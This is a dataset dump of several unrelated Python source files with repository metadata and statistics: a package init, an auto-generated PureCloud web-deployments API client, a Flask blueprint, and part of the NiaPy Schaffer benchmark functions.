5398d6e53e0ac2553fdeccfb76cf9a3d4c4dbfcf
| 136
|
py
|
Python
|
models/__init__.py
|
ZeroMove/classification_Tensorflow_Proj
|
d89bf3a999415c18f6ee3a1248ce7497b955b47f
|
[
"MIT"
] | 9
|
2019-08-15T06:29:43.000Z
|
2022-03-28T14:59:48.000Z
|
models/__init__.py
|
ZeroMove/classification_Tensorflow_Proj
|
d89bf3a999415c18f6ee3a1248ce7497b955b47f
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
ZeroMove/classification_Tensorflow_Proj
|
d89bf3a999415c18f6ee3a1248ce7497b955b47f
|
[
"MIT"
] | 1
|
2019-08-20T01:42:26.000Z
|
2019-08-20T01:42:26.000Z
|
# -*-coding:utf-8-*-
from .simple_model import *
from .resnet_v1_50 import *
from .resnet_v1_101 import *
from .resnet_v1_152 import *
| 19.428571
| 28
| 0.735294
| 22
| 136
| 4.227273
| 0.545455
| 0.322581
| 0.516129
| 0.580645
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.139706
| 136
| 6
| 29
| 22.666667
| 0.692308
| 0.132353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
53c5608803cf8c236a6396203c395db13e97ccea
| 42,948
|
py
|
Python
|
build/PureCloudPlatformClientV2/apis/web_deployments_api.py
|
MyPureCloud/platform-client-sdk-python
|
51249f4c655a1c8a67561c9eaa852ef95e25e57d
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
build/PureCloudPlatformClientV2/apis/web_deployments_api.py
|
MyPureCloud/platform-client-sdk-python
|
51249f4c655a1c8a67561c9eaa852ef95e25e57d
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
build/PureCloudPlatformClientV2/apis/web_deployments_api.py
|
MyPureCloud/platform-client-sdk-python
|
51249f4c655a1c8a67561c9eaa852ef95e25e57d
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
WebDeploymentsApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class WebDeploymentsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_webdeployments_configuration(self, configuration_id, **kwargs):
"""
Delete all versions of a configuration
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_webdeployments_configuration(configuration_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str configuration_id: The configuration version ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_webdeployments_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_id' is set
if ('configuration_id' not in params) or (params['configuration_id'] is None):
raise ValueError("Missing the required parameter `configuration_id` when calling `delete_webdeployments_configuration`")
resource_path = '/api/v2/webdeployments/configurations/{configurationId}'.replace('{format}', 'json')
path_params = {}
if 'configuration_id' in params:
path_params['configurationId'] = params['configuration_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_webdeployments_deployment(self, deployment_id, **kwargs):
"""
Delete a deployment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_webdeployments_deployment(deployment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str deployment_id: The deployment ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['deployment_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_webdeployments_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'deployment_id' is set
if ('deployment_id' not in params) or (params['deployment_id'] is None):
raise ValueError("Missing the required parameter `deployment_id` when calling `delete_webdeployments_deployment`")
resource_path = '/api/v2/webdeployments/deployments/{deploymentId}'.replace('{format}', 'json')
path_params = {}
if 'deployment_id' in params:
path_params['deploymentId'] = params['deployment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_webdeployments_configuration_version(self, configuration_id, version_id, **kwargs):
"""
Get a configuration version
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_webdeployments_configuration_version(configuration_id, version_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str configuration_id: The configuration version ID (required)
:param str version_id: The version of the configuration to get (required)
:return: WebDeploymentConfigurationVersion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_id', 'version_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_webdeployments_configuration_version" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_id' is set
if ('configuration_id' not in params) or (params['configuration_id'] is None):
raise ValueError("Missing the required parameter `configuration_id` when calling `get_webdeployments_configuration_version`")
# verify the required parameter 'version_id' is set
if ('version_id' not in params) or (params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_webdeployments_configuration_version`")
resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/{versionId}'.replace('{format}', 'json')
path_params = {}
if 'configuration_id' in params:
path_params['configurationId'] = params['configuration_id']
if 'version_id' in params:
path_params['versionId'] = params['version_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersion',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_webdeployments_configuration_versions(self, configuration_id, **kwargs):
"""
Get the versions of a configuration
This returns the 50 most recent versions for this configuration
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_webdeployments_configuration_versions(configuration_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str configuration_id: The configuration version ID (required)
:return: WebDeploymentConfigurationVersionEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_webdeployments_configuration_versions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_id' is set
if ('configuration_id' not in params) or (params['configuration_id'] is None):
raise ValueError("Missing the required parameter `configuration_id` when calling `get_webdeployments_configuration_versions`")
resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions'.replace('{format}', 'json')
path_params = {}
if 'configuration_id' in params:
path_params['configurationId'] = params['configuration_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersionEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_webdeployments_configuration_versions_draft(self, configuration_id, **kwargs):
"""
Get the configuration draft
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_webdeployments_configuration_versions_draft(configuration_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str configuration_id: The configuration version ID (required)
:return: WebDeploymentConfigurationVersion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_webdeployments_configuration_versions_draft" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_id' is set
if ('configuration_id' not in params) or (params['configuration_id'] is None):
raise ValueError("Missing the required parameter `configuration_id` when calling `get_webdeployments_configuration_versions_draft`")
resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/draft'.replace('{format}', 'json')
path_params = {}
if 'configuration_id' in params:
path_params['configurationId'] = params['configuration_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersion',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_webdeployments_configurations(self, **kwargs):
"""
View configuration drafts
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_webdeployments_configurations(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param bool show_only_published: Get only configuration drafts with published versions
:return: WebDeploymentConfigurationVersionEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['show_only_published']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_webdeployments_configurations" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/webdeployments/configurations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'show_only_published' in params:
query_params['showOnlyPublished'] = params['show_only_published']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersionEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_webdeployments_deployment(self, deployment_id, **kwargs):
"""
Get a deployment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_webdeployments_deployment(deployment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str deployment_id: The deployment ID (required)
:return: WebDeployment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['deployment_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_webdeployments_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'deployment_id' is set
if ('deployment_id' not in params) or (params['deployment_id'] is None):
raise ValueError("Missing the required parameter `deployment_id` when calling `get_webdeployments_deployment`")
resource_path = '/api/v2/webdeployments/deployments/{deploymentId}'.replace('{format}', 'json')
path_params = {}
if 'deployment_id' in params:
path_params['deploymentId'] = params['deployment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeployment',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_webdeployments_deployments(self, **kwargs):
"""
Get deployments
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_webdeployments_deployments(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: WebDeploymentEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_webdeployments_deployments" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/webdeployments/deployments'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_webdeployments_configuration_versions_draft_publish(self, configuration_id, **kwargs):
"""
Publish the configuration draft and create a new version
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_webdeployments_configuration_versions_draft_publish(configuration_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str configuration_id: The configuration version ID (required)
:return: WebDeploymentConfigurationVersion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_webdeployments_configuration_versions_draft_publish" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_id' is set
if ('configuration_id' not in params) or (params['configuration_id'] is None):
raise ValueError("Missing the required parameter `configuration_id` when calling `post_webdeployments_configuration_versions_draft_publish`")
resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/draft/publish'.replace('{format}', 'json')
path_params = {}
if 'configuration_id' in params:
path_params['configurationId'] = params['configuration_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersion',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_webdeployments_configurations(self, configuration_version, **kwargs):
"""
Create a configuration draft
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_webdeployments_configurations(configuration_version, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param WebDeploymentConfigurationVersion configuration_version: (required)
:return: WebDeploymentConfigurationVersion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_version']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_webdeployments_configurations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_version' is set
if ('configuration_version' not in params) or (params['configuration_version'] is None):
raise ValueError("Missing the required parameter `configuration_version` when calling `post_webdeployments_configurations`")
resource_path = '/api/v2/webdeployments/configurations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration_version' in params:
body_params = params['configuration_version']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersion',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_webdeployments_deployments(self, deployment, **kwargs):
"""
Create a deployment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_webdeployments_deployments(deployment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param WebDeployment deployment: (required)
:return: WebDeployment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['deployment']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_webdeployments_deployments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'deployment' is set
if ('deployment' not in params) or (params['deployment'] is None):
raise ValueError("Missing the required parameter `deployment` when calling `post_webdeployments_deployments`")
resource_path = '/api/v2/webdeployments/deployments'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment' in params:
body_params = params['deployment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeployment',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_webdeployments_configuration_versions_draft(self, configuration_id, configuration_version, **kwargs):
"""
Update the configuration draft
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_webdeployments_configuration_versions_draft(configuration_id, configuration_version, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str configuration_id: The configuration version ID (required)
:param WebDeploymentConfigurationVersion configuration_version: (required)
:return: WebDeploymentConfigurationVersion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration_id', 'configuration_version']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_webdeployments_configuration_versions_draft" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration_id' is set
if ('configuration_id' not in params) or (params['configuration_id'] is None):
raise ValueError("Missing the required parameter `configuration_id` when calling `put_webdeployments_configuration_versions_draft`")
# verify the required parameter 'configuration_version' is set
if ('configuration_version' not in params) or (params['configuration_version'] is None):
raise ValueError("Missing the required parameter `configuration_version` when calling `put_webdeployments_configuration_versions_draft`")
resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/draft'.replace('{format}', 'json')
path_params = {}
if 'configuration_id' in params:
path_params['configurationId'] = params['configuration_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration_version' in params:
body_params = params['configuration_version']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeploymentConfigurationVersion',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_webdeployments_deployment(self, deployment_id, deployment, **kwargs):
"""
Update a deployment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_webdeployments_deployment(deployment_id, deployment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str deployment_id: The deployment ID (required)
:param WebDeployment deployment: (required)
:return: WebDeployment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['deployment_id', 'deployment']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_webdeployments_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'deployment_id' is set
if ('deployment_id' not in params) or (params['deployment_id'] is None):
raise ValueError("Missing the required parameter `deployment_id` when calling `put_webdeployments_deployment`")
# verify the required parameter 'deployment' is set
if ('deployment' not in params) or (params['deployment'] is None):
raise ValueError("Missing the required parameter `deployment` when calling `put_webdeployments_deployment`")
resource_path = '/api/v2/webdeployments/deployments/{deploymentId}'.replace('{format}', 'json')
path_params = {}
if 'deployment_id' in params:
path_params['deploymentId'] = params['deployment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment' in params:
body_params = params['deployment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebDeployment',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 40.10084
| 153
| 0.567128
| 3,957
| 42,948
| 5.949962
| 0.053323
| 0.039755
| 0.023191
| 0.020982
| 0.917771
| 0.908087
| 0.893858
| 0.884004
| 0.878228
| 0.87088
| 0
| 0.000939
| 0.35557
| 42,948
| 1,070
| 154
| 40.138318
| 0.849731
| 0.25929
| 0
| 0.845045
| 0
| 0
| 0.21368
| 0.076445
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025225
| false
| 0
| 0.012613
| 0
| 0.063063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53d84e701658fdae265dfca874e495599929a238
| 115
|
py
|
Python
|
app/routes/yesterday/__init__.py
|
ygorazambuja/covid-scrapper
|
6c714a47c00773fe0391d040dcfed57258d98c07
|
[
"MIT"
] | 7
|
2020-03-28T03:50:07.000Z
|
2020-09-30T02:49:10.000Z
|
app/routes/yesterday/__init__.py
|
ygorazambuja/covid-scrapper
|
6c714a47c00773fe0391d040dcfed57258d98c07
|
[
"MIT"
] | 2
|
2020-03-28T03:27:18.000Z
|
2020-11-03T01:37:39.000Z
|
app/routes/yesterday/__init__.py
|
ygorazambuja/covid-scrapper
|
6c714a47c00773fe0391d040dcfed57258d98c07
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
yesterday_blueprint = Blueprint('yesterday_blueprint', __name__)
from . import views
| 19.166667
| 64
| 0.817391
| 13
| 115
| 6.769231
| 0.538462
| 0.409091
| 0.613636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121739
| 115
| 5
| 65
| 23
| 0.871287
| 0
| 0
| 0
| 0
| 0
| 0.165217
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
53f379e8d81f38631284718794ef655bee8b5d9e
| 7,342
|
py
|
Python
|
NiaPy/benchmarks/schaffer.py
|
lukapecnik/NiaPy
|
a40ac08a4c06a13019ec5e39cc137461884928b0
|
[
"MIT"
] | 1
|
2020-03-16T11:15:43.000Z
|
2020-03-16T11:15:43.000Z
|
NiaPy/benchmarks/schaffer.py
|
lukapecnik/NiaPy
|
a40ac08a4c06a13019ec5e39cc137461884928b0
|
[
"MIT"
] | null | null | null |
NiaPy/benchmarks/schaffer.py
|
lukapecnik/NiaPy
|
a40ac08a4c06a13019ec5e39cc137461884928b0
|
[
"MIT"
] | 1
|
2020-03-25T16:20:36.000Z
|
2020-03-25T16:20:36.000Z
|
# encoding=utf8
"""Implementations of Schaffer benchmarks."""
from math import sin, cos, sqrt
from NiaPy.benchmarks.benchmark import Benchmark
__all__ = ["SchafferN2", "SchafferN4", "ExpandedSchaffer"]
class SchafferN2(Benchmark):
r"""Implementations of Schaffer N. 2 functions.
Date: 2018
Author: Klemen Berkovič
License: MIT
Function: **Schaffer N. 2 Function**
:math:`f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }`
**Input domain:**
The function can be defined on any input domain but it is usually
evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.
**Global minimum:** :math:`f(x^*) = 0`, at :math:`x^* = (420.968746,...,420.968746)`
LaTeX formats:
Inline:
$f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$
Equation:
\begin{equation} f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 } \end{equation}
Domain:
$-100 \leq x_i \leq 100$
Reference:
http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
"""
Name = ["SchafferN2"]
def __init__(self, Lower=-100.0, Upper=100.0):
r"""Initialize Schaffer N. 2 benchmark.
Args:
Lower (Optional[float]): Lower bound of problem.
Upper (Optional[float]): Upper bound of problem.
See Also:
:func:`NiaPy.benchmarks.Benchmark.__init__`
"""
